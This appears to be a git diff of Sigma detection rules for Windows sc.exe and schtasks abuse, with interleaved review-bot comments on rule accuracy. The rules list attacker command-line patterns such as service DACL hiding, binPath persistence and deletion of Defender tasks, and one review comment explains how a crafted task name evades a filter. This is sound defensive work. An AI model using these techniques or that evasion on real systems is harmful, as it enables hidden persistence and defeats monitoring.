@@ -20,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' config ' - start - CommandLine|contains: + CommandLine|contains: - disabled - demand condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml b/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml index 17dc6ac88..2b85ef033 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml @@ -19,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - create - config - CommandLine|contains|all: + CommandLine|contains|all: - binPath - type - kernel - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe condition: process_creation and selection falsepositives: - Rare legitimate installation of kernel drivers via sc.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_query.yml b/sigma/builtin/process_creation/proc_creation_win_sc_query.yml index bf2ec24b9..307259663 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_query.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_query.yml @@ -1,8 +1,7 @@ title: SC.EXE Query Execution id: 57712d7a-679c-4a41-a913-87e7175ae429 status: test -description: Detects execution of "sc.exe" to query information about registered services - on the system +description: Detects execution of "sc.exe" to query information about registered services on the system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery author: frack113 
@@ -20,14 +19,12 @@ detection: Channel: Security selection_img: OriginalFileName|endswith: sc.exe - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe selection_cli: - CommandLine|contains: ' query' + CommandLine|contains: ' query' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate query of a service by an administrator to get more information such - as the state or PID - - Keybase process "kbfsdokan.exe" query the dokan1 service with the following - commandline "sc query dokan1" + - Legitimate query of a service by an administrator to get more information such as the state or PID + - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1" level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml index cd08f13c8..34f69b70c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml 
@@ -1,12 +1,10 @@ title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE id: 6c8fbee5-dee8-49bc-851d-c3142d02aa47 related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Generic SD tampering + type: similar status: test -description: Detects suspicious DACL modifications to allow access to a service from - a suspicious trustee. This can be used to override access restrictions set by - previous ACLs. +description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. references: - https://twitter.com/0gtweet/status/1628720819537936386 - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @@ -24,19 +22,19 @@ detection: EventID: 4688 Channel: Security selection_sc: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - A; + - A; # Allow Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml index 78b5e5133..f38e2db6b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml 
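Review bot: The new `# Generic SD tampering` comment on related id `a537cfc3-4297-4789-92b5-345bfd845ad0` contradicts the other rules in this commit, where that id is the hide-services rule (`Service DACL Abuse To Hide Services Via Sc.EXE`) and is annotated `# Specific Technique`, while `98c5aeef-32d5-492f-b174-64a691896d25` is the one labelled `# Generic SD tampering`. Either change the comment to `# Specific Technique`, or, if the generic rule was meant, reference `98c5aeef-32d5-492f-b174-64a691896d25` instead. The trustee comments in the second hunk (`;IU`, `;SU`, `;BA`, `;SY`, `;WD`) match the SDDL SID aliases and are consistent with the deny rule.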
@@ -1,13 +1,12 @@ title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 related: - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detects suspicious DACL modifications to deny access to a service that - affects critical trustees. This can be used to hide services or make them unstoppable. +description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @@ -26,19 +25,19 @@ detection: EventID: 4688 Channel: Security selection_sc: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - D; + - D; # Deny Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml index fe84a383f..3af159bf9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml 
@@ -1,13 +1,12 @@ title: Service DACL Abuse To Hide Services Via Sc.EXE id: a537cfc3-4297-4789-92b5-345bfd845ad0 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar status: test -description: Detects usage of the "sc.exe" utility adding a new service with special - permission seen used by threat actors which makes the service hidden and unremovable. +description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -29,11 +28,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - sdset + # Summary of permissions + # DC: Delete All Child Objects + # LC: List Contents + # WP: Write All Properties + # DT: Delete Subtree + # SD: Delete - DCLCWPDTSD condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml index 9253a0f75..634ae114b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml 
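Review bot: The permission summary added under `selection_cli` gives the directory-service meanings of the SDDL access tokens (`DC: Delete All Child Objects`, `LC: List Contents`, `WP: Write All Properties`, `DT: Delete Subtree`), but on a service security descriptor the same bits are the service-specific rights: DC (0x2) is SERVICE_CHANGE_CONFIG, LC (0x4) SERVICE_QUERY_STATUS, WP (0x20) SERVICE_STOP, DT (0x40) SERVICE_PAUSE_CONTINUE and SD (0x10000) DELETE, which is what makes a denied `DCLCWPDTSD` ACE hide the service and make it unstoppable as the description states. Rewording the comment to the service rights (`# DC: SERVICE_CHANGE_CONFIG (0x2)`, `# LC: SERVICE_QUERY_STATUS (0x4)`, and so on) keeps it consistent with the rule's intent and the SANS reference. Keeping the hex bit next to each token helps readers map it against other SDDL strings.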
@@ -1,13 +1,12 @@ title: Service Security Descriptor Tampering Via Sc.EXE id: 98c5aeef-32d5-492f-b174-64a691896d25 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detection of sc.exe utility adding a new service with special permission - which hides that service. +description: Detection of sc.exe utility adding a new service with special permission which hides that service. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -29,10 +28,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: sdset + CommandLine|contains: sdset condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml b/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml index 47dc358a3..a837897df 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml 
@@ -1,8 +1,7 @@ title: Suspicious Service Path Modification id: 138d3531-8793-4f50-a2cd-f291b2863d78 status: test -description: Detects service path modification via the "sc" binary to a suspicious - command or path +description: Detects service path modification via the "sc" binary to a suspicious command or path references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -21,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - 'cmd ' - mshta @@ -39,13 +39,14 @@ detection: - cmd /c - cmd /k - cmd /r + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - C:\Windows\TEMP\ - \AppData\Local\Temp - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml index a553c9910..02874ed69 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml 
@@ -1,9 +1,7 @@ title: Potential Persistence Attempt Via Existing Service Tampering id: 38879043-7e1e-47a9-8d46-6bec88e201df status: test -description: Detects the modification of an existing service in order to execute an - arbitrary payload when the service is started or killed as a potential method - for persistence. +description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. references: - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/ author: Sreeman @@ -21,25 +19,25 @@ detection: EventID: 4688 Channel: Security selection_sc: - - CommandLine|contains|all: - - 'sc ' - - 'config ' - - binpath= - - CommandLine|contains|all: - - 'sc ' - - failure - - command= + - CommandLine|contains|all: + - 'sc ' + - 'config ' + - binpath= + - CommandLine|contains|all: + - 'sc ' + - failure + - command= selection_reg_img: - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - FailureCommand - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - ImagePath + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - FailureCommand + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - ImagePath selection_reg_ext: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml b/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml index 8f59cd865..922f86ec2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml 
@@ -1,8 +1,8 @@ title: Stop Windows Service Via Sc.EXE id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -18,20 +18,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: sc.exe - - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe selection_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' filter_kaspersky: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - SubjectUserName|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml index 03ecc2120..8b620626d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml 
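Review bot: The `filter_kaspersky` exclusion keys on `SubjectUserName|contains: AUTHORI / AUTORI`, but in a Security 4688 event a process started by SYSTEM is normally recorded with the machine account (`HOST$`) in SubjectUserName and `NT AUTHORITY` only in SubjectDomainName, so this filter is unlikely to ever match on builtin logs and the two service stops it lists will keep alerting. Matching the well-known SID is language-independent and survives the Sysmon-to-builtin field mapping: `SubjectUserSid: S-1-5-18`. The new comment also states there is a double space between `sc` and `stop` in the Kaspersky value, yet the value as rendered here shows a single space; if that extra space was lost in conversion the entry never matches either, so it is worth confirming against the vendor's real command line or loosening it to `CommandLine|contains: stop KSCWebConsoleMessageQueue`.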
@@ -20,22 +20,23 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - /Create - /RU - /TR - C:\Users\ - \AppData\Local\ - CommandLine|contains: - - NT AUT - - ' SYSTEM ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space + NewProcessName|endswith: \schtasks.exe filter: - CommandLine|contains: /TN TVInstallRestore + # FP from test set in SIGMA + CommandLine|contains: /TN TVInstallRestore ParentProcessName|contains|all: - \AppData\Local\Temp\ - TeamViewer_.exe - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml index b7c4947be..086b74a09 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml 
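Review bot: The TeamViewer `filter` depends on `ParentProcessName`, which the SYSTEM-privilege schtasks rule in this same update deliberately comments out for 4688 events because the field is not populated on every OS version; where it is absent the filter never matches and each TeamViewer install fires this rule. Keying the exclusion on the command line keeps it portable and mirrors the sibling rule: `CommandLine|contains|all:` / `- /TN TVInstallRestore` / `- \TeamViewer_.exe`, dropping the `ParentProcessName` clause. The `NewProcessName|endswith: \schtasks.exe` repeated inside `filter` is already required by `selection` and adds nothing.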
@@ -1,18 +1,13 @@ title: Suspicious Modification Of Scheduled Tasks id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b related: - - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 - type: similar + - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 # Security-Audting Eventlog + type: similar status: test -description: 'Detects when an attacker tries to modify an already existing scheduled - tasks to run from a suspicious location - - Attackers can create a simple looking task in order to avoid detection on creation - as it''s often the most focused on - +description: | + Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location + Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload - - ' references: - Internal Research - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -30,12 +25,12 @@ detection: EventID: 4688 Channel: Security selection_schtasks: - CommandLine|contains|all: + CommandLine|contains|all: - ' /Change ' - ' /TN ' - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp - \AppData\Roaming\ - \Users\Public\ @@ -50,7 +45,7 @@ detection: - '%comspec%' - '%localappdata%' selection_susp_images: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - 'cmd /c ' diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml index 16de84725..5a5fe2b2a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml 
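Review bot: The comment added on the `related` entry, `# Security-Audting Eventlog`, misspells "Auditing"; the same spelling is added to the related entries of the delete and disable rules in this update, so one search-and-replace to `# Security-Auditing Eventlog` fixes the set. It is not behaviour-affecting, but these comments are what an analyst reads when following a related-rule ID, and an unsearchable misspelling defeats that purpose.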
@@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' /create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: ' /create ' + NewProcessName|endswith: \schtasks.exe filter: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml index 60deb5516..8c0d79136 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml @@ -1,8 +1,7 @@ title: Suspicious Scheduled Task Creation Involving Temp Folder id: 39019a4e-317f-4ce3-ae63-309a8c6b53c5 status: test -description: Detects the creation of scheduled tasks that involves a temporary folder - and runs only once +description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once references: - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 author: Florian Roth (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /create ' - ' /sc once ' - \Temp\ - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml index dfc3ec3da..be9b46d45 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml 
@@ -1,13 +1,12 @@ title: Delete Important Scheduled Task id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 related: - - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d - type: similar - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog + type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by deleting their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -23,10 +22,11 @@ detection: EventID: 4688 Channel: Security schtasks_exe: - CommandLine|contains|all: + CommandLine|contains|all: - /delete - /tn - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker @@ -34,7 +34,7 @@ detection: - \Windows\WindowsUpdate\ - \Windows\UpdateOrchestrator\ - \Windows\ExploitGuard - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and (all of schtasks_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml index 9da2a9bed..2980d58e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml 
@@ -1,9 +1,7 @@ title: Delete All Scheduled Tasks id: 220457c1-1c9f-4c2e-afe6-9598926222c1 status: test -description: Detects the usage of schtasks with the delete flag and the asterisk symbol - to delete all tasks from the schedule of the local computer, including tasks scheduled - by other users. +description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /delete ' - /tn \* - ' /f' - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml index 9acedbd86..cff0d0edf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml 
@@ -1,11 +1,10 @@ title: Disable Important Scheduled Task id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 related: - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by disabling their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task - https://twitter.com/MichalKoczwara/status/1553634816016498688 @@ -24,11 +23,12 @@ detection: EventID: 4688 Channel: Security schtasks_exe: - CommandLine|contains|all: + CommandLine|contains|all: - /Change - /TN - /disable - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker @@ -36,7 +36,7 @@ detection: - \Windows\WindowsUpdate\ - \Windows\UpdateOrchestrator\ - \Windows\ExploitGuard - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and (all of schtasks_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml index 9604e7926..f2275fdef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml 
@@ -1,11 +1,10 @@ title: Suspicious Schtasks From Env Var Folder id: 81325ce1-be01-4250-944f-b4789644556f related: - - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 - type: derived + - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline + type: derived status: experimental -description: Detects Schtask creations that point to a suspicious folder or an environment - variable often used by malware +description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware references: - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/ - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection1_create: - CommandLine|contains: ' /create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: ' /create ' + NewProcessName|endswith: \schtasks.exe selection1_all_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \AppData\Local\ 
@@ -37,43 +36,42 @@ detection: selection2_parent: ParentCommandLine|endswith: \svchost.exe -k netsvcs -p -s Schedule selection2_some_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \Users\Public - '%Public%' filter_mixed: - - CommandLine|contains: - - update_task.xml - - /Create /TN TVInstallRestore /TR - - ParentCommandLine|contains: unattended.ini + - CommandLine|contains: + - update_task.xml + - /Create /TN TVInstallRestore /TR + - ParentCommandLine|contains: unattended.ini filter_avira_install: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /Xml "C:\Users\ - \AppData\Local\Temp\.CR. - Avira_Security_Installation.xml filter_avira_other: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /F /TN - '/Xml ' - \AppData\Local\Temp\is- - Avira_ - CommandLine|contains: + CommandLine|contains: - .tmp\UpdateFallbackTask.xml - .tmp\WatchdogServiceControlManagerTimeout.xml - .tmp\SystrayAutostart.xml - .tmp\MaintenanceTask.xml filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Temp\ - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml - condition: process_creation and (( all of selection1* or all of selection2* ) - and not 1 of filter*) + condition: process_creation and (( all of selection1* or all of selection2* ) and not 1 of filter*) falsepositives: - - Benign scheduled tasks creations or executions that happen often during software - installations - - Software that uses the AppData folder and scheduled tasks to update the software - in the AppData folders + - Benign scheduled tasks creations or executions that happen often during software installations + - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders level: medium ruletype: Sigma 
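Review bot: `filter_mixed` suppresses any command line containing `update_task.xml` or `/Create /TN TVInstallRestore /TR`, and any parent command line containing `unattended.ini`; all three are strings the task creator controls, so a task registered with `/TN update_task.xml`, or created by a stager launched as `loader.exe unattended.ini`, bypasses the rule entirely. Anchoring each exclusion to the full argument shape narrows that: the TeamViewer entry becomes `CommandLine|contains|all:` with `- '/Create /TN TVInstallRestore /TR '` and `- \TeamViewer_.exe`, and the `update_task.xml` entry should likewise be paired with the installer path it was added for (the rule does not record which product that is). The Avira filters in this hunk already use `contains|all`, so this only makes `filter_mixed` consistent with them.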
diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml index 0f002b517..26beefb2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml @@ -1,8 +1,7 @@ title: Schtasks From Suspicious Folders id: 8a8379b8-780b-4dbf-b1e9-31c8d112fefb status: test -description: Detects scheduled task creations that have suspicious action command - and folder combinations +description: Detects scheduled task creations that have suspicious action command and folder combinations references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical author: Florian Roth (Nextron Systems) @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_create: - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' selection_command: - CommandLine|contains: + CommandLine|contains: - powershell - pwsh - 'cmd /c ' @@ -34,7 +33,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_all_folders: - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - '%ProgramData%' condition: process_creation and (all of selection_*) diff --git 